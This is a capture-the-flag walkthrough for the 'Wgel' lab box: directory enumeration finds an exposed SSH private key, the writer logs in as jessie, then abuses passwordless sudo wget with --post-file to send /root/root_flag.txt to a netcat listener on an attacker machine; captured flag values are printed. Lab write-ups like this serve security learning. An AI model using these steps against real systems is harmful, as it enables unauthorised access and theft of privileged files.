CTF Walkthrough: Wgel

A quick box that chains a leaky .ssh directory into a classic wget GTFObins privilege escalation. Nothing exotic here, but a good reminder of why source code review and hidden directory enumeration never go out of style.

CTF

LeadHand

7/3/20262 min read

1. Reconnaissance

An initial scan turned up two open services:

Port Service Version 22 SSH OpenSSH 7.2p2 (Ubuntu) 80 HTTP Apache 2.4.18 (Ubuntu)

With SSH locked behind key-based auth (presumably) and only a web server to poke at, directory enumeration was the obvious next move.

gobuster dir -u http://10.80.186.48 -w /usr/share/wordlists/dirb/common.txt

This revealed a /sitemap/ directory sitting on the web root — not something you'd expect to be browsable. Poking around inside it turned up an unprotected .ssh folder:

http://10.80.186.48/sitemap/.ssh/

Sitting inside was an RSA private key, just waiting to be downloaded. Classic misconfiguration — a backup or leftover directory that should never have been exposed publicly.

The next question was whose key this was. A look at the raw HTML source of the site (Ctrl+U) answered that: a developer comment referenced the username Jessie.

2. Exploitation

Authentication

With a private key and a username in hand, the rest was straightforward:

# Save the key and fix permissions (SSH will refuse loose ones) cp id_rsa ~/.ssh/id_rsa_wgel chmod 600 ~/.ssh/id_rsa_wgel # Authenticate ssh -i ~/.ssh/id_rsa_wgel jessie@10.80.186.48

Access granted — no passphrase required.

User Flag

/home/jessie/Documents/user_flag.txt 057c67131c3d5e42dd5cd3075b198ff6

3. Privilege Escalation

With a foothold as jessie, the standard first move is checking sudo permissions:

sudo -l

Output showed:

(root) NOPASSWD: /usr/bin/wget

wget being sudo-able without a password is a well-known escalation path — it's flexible enough to read arbitrary files or even write them, depending on how it's invoked. A quick check against GTFOBins confirms the technique: wget supports a --post-file flag that can be abused to exfiltrate a local file to an attacker-controlled listener.

Root Flag Retrieval

On the attacking (Kali) machine, start a listener:

nc -nlvp 4444

Then, on the target, use the sudo wget privileges to POST the root flag's contents to that listener:

sudo /usr/bin/wget --post-file=/root/root_flag.txt http://[KALI-IP]:4444

The file contents arrive on the listener as the body of an HTTP POST request:

b1b968b37519ad1daa6408188649263d

Root flag captured.

💡 Learning Tips

  • Source code is king. Never skip reading the raw HTML source. Developer comments are a goldmine for usernames, internal paths, and configuration hints that scanners often miss.

  • Don't ignore hidden directories. Automated tools like gobuster are essential, but it's worth manually checking common sensitive subdirectory names (.ssh, .config, .backup, .git) — misconfigured web roots love to expose these.

  • Understand your tools. wget isn't just a downloader — it can read, write, and exfiltrate files depending on its flags. Any time you see NOPASSWD next to an unexpected binary in sudo -l, check GTFOBins before assuming it's a dead end.

  • Stay organized. Document findings as you go. If you recover a private key, immediately set the correct permissions (chmod 600) and test it methodically — sloppy permissions are the most common cause of a frustrating "Permission denied" rabbit hole.

Stay secure. Stay informed. Stay ahead

© 2025. All rights reserved.